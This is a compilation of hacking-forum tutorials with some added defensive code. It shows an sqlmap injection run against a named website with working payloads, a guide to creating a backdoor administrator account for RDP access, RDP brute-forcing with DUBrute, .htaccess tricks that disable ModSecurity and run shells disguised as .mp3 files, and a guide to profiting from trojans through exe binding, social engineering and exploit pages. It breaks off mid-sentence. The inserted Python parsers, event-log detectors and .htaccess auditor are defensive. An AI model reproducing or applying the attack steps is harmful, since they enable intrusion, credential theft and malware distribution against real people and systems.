If you prefer a guided setup, the tool also includes a wizard mode with the following syntax:


./sqlmap.py --wizard


root@bt:/pentest/database/sqlmap# ./sqlmap.py --wizard


sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org


[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:10:02


Please enter full target URL (-u): http://www.centro-lomas.com.ar/detalles.php?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1


sqlmap is running, please wait..


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#


Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---



web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
banner: '5.1.66-cll'


current user: 'cenlom09_gestor@localhost'


current database: 'cenlom09_capacitacion'


current user is DBA: None


shutting down at 18:10:53


The wizard asks for the target URL, any POST data, the injection difficulty (--level/--risk) and how much to enumerate (--banner/--current-user and so on), then runs the tests for you. Note that this second run reports "a total of 0 HTTP(s) requests": sqlmap resumed the injection points it had already saved in its session file for that target, so only the enumeration queries (banner, current user, current database) were actually sent.
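To turn output like the block above into something a report or a ticket can use, here is a small parser, added as an example and not part of the original post or of sqlmap itself. It takes the summary text sqlmap printed for detalles.php?id=1 (embedded below as the sample input, with the split hex literal joined), pulls out the four techniques, cross-checks the UNION column count in the title against the payload's SELECT list, and decodes the 0x... literals, which shows the marker trick sqlmap uses to find extracted data in the page. The function names are mine.

```python
import re

# Sample input, constructed from the summary sqlmap printed for detalles.php?id=1
# above (the split hex literal in the UNION payload is joined back together).
SQLMAP_SUMMARY = """\
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2747=2747

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
"""


def parse_summary(text):
    """Turn the 'Place/Parameter/Type/Title/Payload' block into a dict.

    Older sqlmap builds (like the 1.0-dev one above) print 'Place:' and
    'Parameter:' on separate lines; the fingerprint lines after the second
    '---' are collected into result['fingerprint'].
    """
    result = {"place": None, "parameter": None, "techniques": [], "fingerprint": {}}
    current = None
    for raw in text.splitlines():
        key, _, value = raw.strip().partition(":")
        key, value = key.strip(), value.strip()
        if key == "Place":
            result["place"] = value
        elif key == "Parameter":
            result["parameter"] = value
        elif key == "Type":
            current = {"type": value, "title": "", "payload": ""}
            result["techniques"].append(current)
        elif key in ("Title", "Payload") and current is not None:
            current[key.lower()] = value
        elif key in ("web application technology", "back-end DBMS"):
            result["fingerprint"][key] = value
    return result


def decode_hex_literals(payload):
    """Decode the 0x... string literals sqlmap embeds in a payload.

    sqlmap wraps whatever it extracts in random marker strings (here ':iaz:'
    and ':qtw:') so it can find the result in the HTML; the hex form avoids
    quotes, which the injection point may filter.
    """
    out = []
    for hexstr in re.findall(r"0x([0-9a-fA-F]+)", payload):
        try:
            out.append(bytes.fromhex(hexstr).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append(None)  # odd length or non-ASCII: not a string literal
    return out


def split_select_list(expr):
    """Split a SELECT list on commas that are not nested inside parentheses."""
    fields, depth, cur = [], 0, []
    for ch in expr:
        if ch == "," and depth == 0:
            fields.append("".join(cur).strip())
            cur = []
            continue
        depth += ch == "("
        depth -= ch == ")"
        cur.append(ch)
    fields.append("".join(cur).strip())
    return fields


def union_column_count(techniques):
    """Column count sqlmap settled on for the UNION technique, cross-checked
    between the '... - N columns' title and the payload's SELECT list.
    Returns None if there is no UNION technique or the two disagree."""
    for t in techniques:
        if t["type"] != "UNION query":
            continue
        m = re.search(r"(\d+) columns", t["title"])
        select_list = t["payload"].split("UNION ALL SELECT", 1)[-1].rstrip("#")
        n_payload = len(split_select_list(select_list))
        return n_payload if m and int(m.group(1)) == n_payload else None
    return None
```

The error-based payload decodes to the same two markers, which is how sqlmap tells its own injected output apart from the rest of the MySQL error message.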

Mozilla Firefox - The hacker's choice

Security testers and hackers have plenty of tools to play with. But what if your browser could help you as well?


The browser in question is Mozilla Firefox, together with the extensions/add-ons developed by professional ethical hackers and penetration testers.


In this article I will cover some of the best add-ons of all time that hackers use.

Download Firefox from Google


Now back to topic


Social engineering add-on

People Search and Public Record: a very handy Firefox extension for investigators, hackers, legal professionals, and anyone interested in doing their own basic people searches, public record look-ups and background research.


Google and Spider

Advanced Dork: gives quick access to Google's advanced search operators ("dorks") directly from the context menu. It can be used to look for exposed files or to narrow in on a target.


SpiderZilla: an easy-to-use website mirroring utility based on HTTrack.


Editors (WEBMASTER)

JSView: the "View Page Source" menu item now opens files according to the behaviour you choose in the JSView options, so you can open the source of any web page (and its linked scripts and stylesheets) in a new tab or in an external editor.


Firebug: integrates with Firefox to put a wealth of development tools at hand while you browse. You can edit, debug and monitor CSS, HTML and JavaScript live in any web page.

XML Developer Toolbar: lets XML developers use their standard tools from within the browser.


Headers manipulation and agent switcher


HeaderMonitor: shows any HTTP response header of the top-level document in a status-bar panel: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl: control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher: adds a menu and a toolbar button to switch the browser's user agent.


Cookies manipulation/editors


Add N Edit Cookies: a cookie editor that lets you add and edit session and saved cookies.


httpOnly: adds HttpOnly cookie support to Firefox builds that lack it natively, by encrypting cookies marked HttpOnly on the browser side so page scripts cannot read them.
AllCookies: dumps ALL cookies (including session cookies) to Firefox's standard cookies.txt file.


Security Tools

HackBar: a toolbar that helps with testing SQL injection, XSS holes and site security. It will not exploit a vulnerability for you or teach you hacking; its main purpose is to help you audit your own code.

Tamper Data: view and modify HTTP/HTTPS headers and POST parameters before the request is sent.

Chickenfoot: puts a programming environment in the browser's sidebar so you can write scripts that manipulate web pages and automate browsing.


Proxy utilities


POW (Plain Old WebServer): uses server-side JavaScript to run a web server inside your browser. Use it to distribute files from your browser. It supports server-side JS, GET, POST, uploads, cookies, SQLite and AJAX, and has security features to password-protect your site. Users have built a wiki, a chat room and a search engine with SJS.


FoxyProxy: an advanced proxy management tool that completely replaces Firefox's proxy configuration. It offers more features than SwitchProxy, Proxy Button, etc.


SwitchProxy: lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes.


Miscellaneous

Hacks for fun

Greasemonkey: lets you customize the way a web page displays using small bits of JavaScript. Scripts can be downloaded from the user scripts repository.

Monday, 20 March 2017

Windows Rooting | How to get RDP Access.

Windows rooting, or how to gain RDP access.

NOTE: This guide is for educational purposes only. I do not take any responsibility for anything that happens after you read it. I am only telling you how this is done, not to do it. It's your decision.




This is different from the *nix process: there we use an exploit, here we use only commands. If we can't execute those commands we can try some alternatives, but the odds of success are low. I'll explain why a bit later.


What we need:
- A shell attached to some site
- The server must be running Windows


We open our shell, go to the command console and first check who we are:
Code:

whoami


This tells us which user the shell is running as, for example:
Code:


Administrator or SYSTEM


That's good, we are running as Administrator. Now let's see how many users the server has:
Code:


net user


And we'll see something like:
Code:


C:\Users\Administrator>net user

User accounts for \\SERVER

-------------------------------------------------------------------------------
Administrator            Guest                    Remote
The command completed successfully.


So there are three users on this server: Administrator, Guest and Remote.
Let's add a new user, e.g. Dark-X:
Code:


net user Dark-X /add


To add the user with a password in one go:
Code:


net user Username Password /add


When we execute this command we get:
Code:


The command completed successfully.


Now let's check:
Code:


net user Dark-X


This displays something like:
Code:


User name                    Dark-X
Full Name                    Dark-X

Last logon                   XX/XX/XXXX XX:XX:XX
Local Group Memberships      *Users


So we are only in the Users group. To connect over Remote Desktop the account has to be in the Administrators group (or in Remote Desktop Users; the "Remote" in the list above is a user account, not a group), so we type, group name first and user name second:
Code:


net localgroup Administrators Dark-X /add


and we will see the same line again:
Code:


The command completed successfully.


If we see this, our user has been added to the Administrators group and we can try to connect over RDP and access the whole server (assuming Remote Desktop is enabled on it and TCP port 3389 is reachable).
Windows RDP Starting:
Code:


Start Menu=>All Programs=>Accessories=>Remote Desktop Connection


Linux:
Code:


Open a terminal and run: rdesktop -u Username -p Password IP


or
Code:


rdesktop IP


Well guys, one more tutorial finished :-)
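From the defender's side, the three commands above leave a very recognisable trail in the Windows Security log: 4720 (user account created), 4732 (member added to a security-enabled local group, here Builtin\Administrators, SID S-1-5-32-544) and then a 4624 logon with LogonType 10 (RemoteInteractive, i.e. RDP). The following script is an added example, not part of the original post; it correlates those three events within a time window. The event records are constructed for the example and simplified: real 4732 events carry the member as a SID, which this script assumes has already been resolved to a name.

```python
from datetime import datetime, timedelta

# Well-known SID of the Builtin\Administrators group.
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample events (a subset of the fields Windows logs). The member
# of the 4732 event is given by name here; real records carry a SID.
SAMPLE_EVENTS = [
    {"time": "2017-03-20T09:00:00", "id": 4720, "target": "svc_backup", "subject": "Administrator"},
    {"time": "2017-03-20T12:30:00", "id": 4624, "target": "svc_backup", "logon_type": 5, "src_ip": "-"},
    {"time": "2017-03-20T18:01:10", "id": 4720, "target": "Dark-X", "subject": "Administrator"},
    {"time": "2017-03-20T18:01:45", "id": 4732, "member": "Dark-X",
     "group_sid": ADMINISTRATORS_SID, "subject": "Administrator"},
    {"time": "2017-03-20T18:03:02", "id": 4624, "target": "Dark-X", "logon_type": 10,
     "src_ip": "203.0.113.7"},
]


def find_backdoor_admin_chains(events, window=timedelta(hours=1)):
    """Return (account, source_ip) for every account that was created (4720),
    added to Administrators (4732 with group SID S-1-5-32-544) and then logged
    on over RDP (4624 with LogonType 10), all within `window` of its creation."""
    parsed = sorted(({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
                    key=lambda e: e["ts"])
    created, promoted, hits = {}, set(), []
    for e in parsed:
        if e["id"] == 4720:
            created[e["target"]] = e["ts"]
        elif e["id"] == 4732 and e.get("group_sid") == ADMINISTRATORS_SID:
            acct = e["member"]
            if acct in created and e["ts"] - created[acct] <= window:
                promoted.add(acct)
        elif e["id"] == 4624 and e.get("logon_type") == 10:
            acct = e["target"]
            if acct in promoted and e["ts"] - created[acct] <= window:
                hits.append((acct, e["src_ip"]))
    return hits


def new_local_admins(events):
    """Weaker check that is still useful on its own: every account added to
    the local Administrators group, together with who added it."""
    return [(e["member"], e["subject"]) for e in events
            if e["id"] == 4732 and e.get("group_sid") == ADMINISTRATORS_SID]
```

The one-hour window is an assumption; on a real estate the 4720/4732 pair from a web server's own account (the shell runs as the IIS or Apache service account, or as Administrator if the box was set up that way) is already worth an alert without waiting for the logon.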

RDP/VPS Crack Method Tutorial

Here is a small tutorial about cracking Remote Desktop Protocol (RDP) servers and VPSs.

NOTE: This guide is for educational purposes only. I do not take any responsibility for anything that happens after you read it. I am only telling you how this is done, not to do it. It's your decision.



In this method we will use nmap + DUBrute.
Download link:
http://uploading.com/117b4232/DUbrute-Scanner-IP-zip

This method should be run on a VPS or RDP box, not on your own PC.

Steps:

Nr.1 Install nmap on the RDP box.
Nr.2 Open the Windows batch file to scan IPs.
Nr.3 When the scan finishes, a .txt file with the IP results is created.
Now we are done with the IP scanning.
Nr.4 Open DUBrute.
Nr.5 Go to Generation.
Nr.6 For the IP file choose resultat.txt.
Nr.7 For the usernames file choose Usernames.txt.
Nr.8 For the passwords file choose passwords.txt.
Nr.9 Click Make, then EXIT.
Nr.10 Open Config and change the thread count from 10 to 400.
Nr.11 Click Start.


Now wait, be patient.

NOTE: the resultat.txt with the IPs should be 150 KB or more!
NOTE: use it on an RDP/VPS.
NOTE: never use it on your own PC, it will error out.


This method used to be sold, but it's free here.

Enjoy

Hack&Peace ---> Make love, NOT war!

Thanks.
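DUBrute at 400 threads produces a burst of failed logons that is trivial to spot on the target. As an added example (not part of the original post), here is the detection logic for that burst over Windows Security events: a sliding window of 4625 (failed logon) events per source address, the usernames that were cycled, and whether a 4624 success followed, which is the signal that the list contained a valid password. The events are constructed for the example, and the threshold and window are assumptions to tune.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def sample_events():
    """Constructed sample: one source cycling four usernames against RDP
    (30 failures in 30 seconds, then a successful logon), plus two unrelated
    typos from an internal address hours apart."""
    base = datetime(2017, 3, 20, 22, 0, 0)
    attacker, office = "198.51.100.23", "10.0.0.5"
    names = ["administrator", "admin", "remote", "user"]
    events = [{"time": base + timedelta(seconds=i), "id": 4625, "logon_type": 10,
               "src_ip": attacker, "target": names[i % 4]} for i in range(30)]
    events.append({"time": base + timedelta(seconds=40), "id": 4624, "logon_type": 10,
                   "src_ip": attacker, "target": "remote"})
    events.append({"time": base - timedelta(hours=3), "id": 4625, "logon_type": 10,
                   "src_ip": office, "target": "jsmith"})
    events.append({"time": base - timedelta(hours=1), "id": 4625, "logon_type": 10,
                   "src_ip": office, "target": "jsmith"})
    return events


def detect_rdp_bruteforce(events, threshold=20, window=timedelta(minutes=5)):
    """Flag source IPs with >= `threshold` failed RDP logons (4625, LogonType 10)
    inside any `window`, and record whether a success (4624) followed."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e.get("logon_type") == 10:          # only RemoteInteractive (RDP) logons
            by_ip[e["src_ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        recent, tried, burst_at, success_as = deque(), set(), None, None
        for e in evs:
            if e["id"] == 4625:
                recent.append(e["time"])
                tried.add(e["target"].lower())
                while e["time"] - recent[0] > window:   # drop failures outside the window
                    recent.popleft()
                if burst_at is None and len(recent) >= threshold:
                    burst_at = e["time"]
            elif e["id"] == 4624 and burst_at is not None:
                success_as = e["target"]                 # password found after the burst
        if burst_at is not None:
            alerts[ip] = {
                "failures": sum(1 for e in evs if e["id"] == 4625),
                "usernames": sorted(tried),
                "first_burst": burst_at,
                "success_as": success_as,
            }
    return alerts
```

A success_as that is not None is the case to act on first: the account named there now has a known password and, as the previous post shows, may already be in the Administrators group.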

Bypass Server Security 100%

First, if you can't execute commands through a Python, Perl or CGI script even after giving the script chmod 0755, the solution is to upload this small PHP file and edit it with the name of the file you want to make executable.

NOTE: This guide is for educational purposes only. I do not take any responsibility for anything that happens after you read it. I am only telling you how this is done, not to do it. It's your decision.




Example for a file named "perl.pl":

CODE:

<?php
// Make the uploaded script executable from PHP; this only works if the file
// is owned by the user the web server runs PHP as.
chmod("perl.pl", 0755);
?>

Then save this file with a ".php" extension.

If the host is locked down and you can't list directories, upload a file or edit a file, use this ".htaccess" to switch the ModSecurity filter off. SecFilterEngine is the ModSecurity 1.x directive; 2.x uses SecRuleEngine Off, and either one only takes effect if the server is configured to honour ModSecurity directives in .htaccess, which it is not by default:

CODE:

<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>


Remember, if Perl doesn't work with the PHP helper, just use this ".htaccess":


CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .pl

AddHandler cgi-script .pl



For Python do the same but change ".pl" to ".py". For a generic CGI script, use this ".htaccess":


CODE:


Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root


If you want to bypass the upload restrictions and upload a shell with another extension, use this ".htaccess" (it makes Apache run every .mp3 file in that directory as PHP):

CODE:

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
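The defender's check for everything in this post is to look for exactly these directives in .htaccess files under directories the web application can write to. The auditor below is an added example, not from the original post; it takes the fragments quoted above as constructed sample input and flags handler remaps onto non-script extensions, risky Options, and ModSecurity being switched off. The handler and extension lists are my assumptions and can be extended.

```python
import os
import re

# Samples taken from the .htaccess fragments in this post, plus a harmless one.
HTACCESS_HANDLER = r'<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>'
HTACCESS_CGI = """Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .root
AddHandler cgi-script .root
"""
HTACCESS_MODSEC = """<IfModule mod_security.c>
SecFilterEngine Off
</IfModule>
"""
HTACCESS_BENIGN = "Options -Indexes\nRewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n"

# Handlers/types that make Apache execute a file (assumed list), and the
# extensions that are expected to be executable anyway; anything else mapped
# onto one of these handlers is suspicious.
SCRIPT_HANDLERS = {"application/x-httpd-php", "application/x-httpd-cgi", "cgi-script",
                   "php5-script", "php7-script", "fcgid-script"}
SCRIPT_EXT = re.compile(r"\.(php\d*|phtml|pl|py|cgi)$", re.I)
RISKY_OPTIONS = {"execcgi", "indexes", "followsymlinks"}


def audit_htaccess(text):
    """Return (line_no, severity, message) for each risky directive."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # AddHandler/AddType: a non-script extension routed to an interpreter
        m = re.search(r"\b(AddHandler|AddType)\s+(\S+)\s+(.+)", line, re.I)
        if m and m.group(2).lower() in SCRIPT_HANDLERS:
            odd = [ext for ext in m.group(3).split() if not SCRIPT_EXT.search(ext)]
            if odd:
                findings.append((n, "high", f"{m.group(1)} maps {' '.join(odd)} to {m.group(2)}"))
        # SetHandler: everything in scope (or the whole directory) becomes a script
        m = re.search(r"\bSetHandler\s+(\S+)", line, re.I)
        if m and m.group(1).lower() in SCRIPT_HANDLERS:
            scope = re.search(r'<(?:Files|FilesMatch)\s+"?([^">]+)"?', line, re.I)
            findings.append((n, "high", f"SetHandler {m.group(1)} for "
                             f"{scope.group(1) if scope else 'the whole directory'}"))
        # Options: only flag options being enabled, not '-Indexes' style removals
        m = re.match(r"Options\s+(.+)", line, re.I)
        if m:
            enabled = [o for o in m.group(1).split()
                       if not o.startswith("-") and o.lstrip("+").lower() in RISKY_OPTIONS]
            if enabled:
                findings.append((n, "medium", "Options enables " + " ".join(enabled)))
        if re.match(r"(SecFilterEngine|SecRuleEngine)\s+Off\b", line, re.I):
            findings.append((n, "high", "mod_security disabled"))
    return findings


def audit_tree(root):
    """Walk a document root (e.g. an uploads directory) and audit every
    .htaccess found; returns {path: findings} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = audit_htaccess(fh.read())
            if findings:
                report[path] = findings
    return report
```

Run audit_tree("/var/www/html/uploads") on a real tree. The structural fix is AllowOverride None for upload directories in the server configuration, so Apache never reads a .htaccess there at all, and keeping ExecCGI and script handlers out of any directory the web application can write to.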


For more information check some old pastebins I posted ^_^

http://pastebin.com/NapunGnJ

http://pastebin.com/VJQN4AvF

You can find many more if you search Google. Enj0y ;)

Thanks.

Trojans for real profit : Tutorial

This tutorial assumes you already have a trojan that grabs accounts and other private info from the victim for you.



First of all, after you buy a trojan you need a web server where all your logs will be kept. Using e-mail for this is not a good idea. First, your e-mail account can be stolen. Second, free mailboxes have space limits and anti-spam features: if you have a big botnet sending a lot of logs, your mailbox fills up and no new logs are received, and the anti-spam filter can block most of the mails the trojans send you. Avoiding anti-spam filters is hard because every provider uses its own system and the programmer would have to study all of them. That takes a lot of time and the game is not worth the candle.


So you need hosting for storing the logs. Most hosting providers support PHP, ASP, MySQL and other features, so you just need to choose the provider you like best; almost any hosting is acceptable for keeping logs.
All the scripts you need for my spyware are included in the package, so all you have to do is upload them and set the right permissions on the files.
One thing you need on your hosting is the PHP option "register_globals" set to On (a setting that was deprecated in PHP 5.3 and removed in PHP 5.4), so check that your hosting provider still allows it before purchasing.


So we have hosting. Next we need to distribute the trojan to as many victims as we can.
There are a lot of ways to do it.
Running the exe file:


If it's someone you know, you could try tricking them into running the file. Make up some story to get them to run it; once they run it, they're infected.
You could also hide it inside another exe file. This is called exe binding; search Google for it and you'll find a dozen exe binders. You take some exe file, perhaps an actual game, bind the trojan to it, and get them to run the new exe. After you say "I just got a cool game, check it out" and send them the game+trojan exe, they won't suspect anything because it actually is a game.


Using an exploit

There are several exploits for Windows, for Internet Explorer, etc. An exploit is a flaw in a program that you can abuse to do a desired task. For example, there was a flaw in Internet Explorer a while back that let you give someone a link that displayed anything you wanted in the address bar while actually going to whatever website you wanted (e.g. displaying "http://www.ebay.com" while it actually went to "http://www.yourfakepage.com"). Anyway, if you can find out what operating system your victim is using, you could try to find an exploit on the internet that lets you run remote code on their computer.
The most popular are exploits for Internet Explorer that upload and run the trojan on the victim's computer.


People who use this route make a scam page where they place the exploit and the trojan, and get people to visit it. When a victim visits the swindler's page, they get infected. It's simple, but you have to make people visit your site. For this, swindlers use SPAM or companies that sell traffic, clicks or pop-up banner views. Swindlers card the traffic companies, which then send people to your page to get infected. How they do that is another story and would take another tutorial, so let's leave it undisclosed. They simply force people to visit your site.


Using RTSW.Smash I-WORM or other trojan droppers:

Another way is using viruses called i-worms. These are self-spreading systems that reach the victim's computer by themselves, using e-mail, P2P networks, operating system vulnerabilities, other backdoors/i-worms or other methods of spreading. After infection, such programs can download any program you wish to the victim's computer. It can be trojan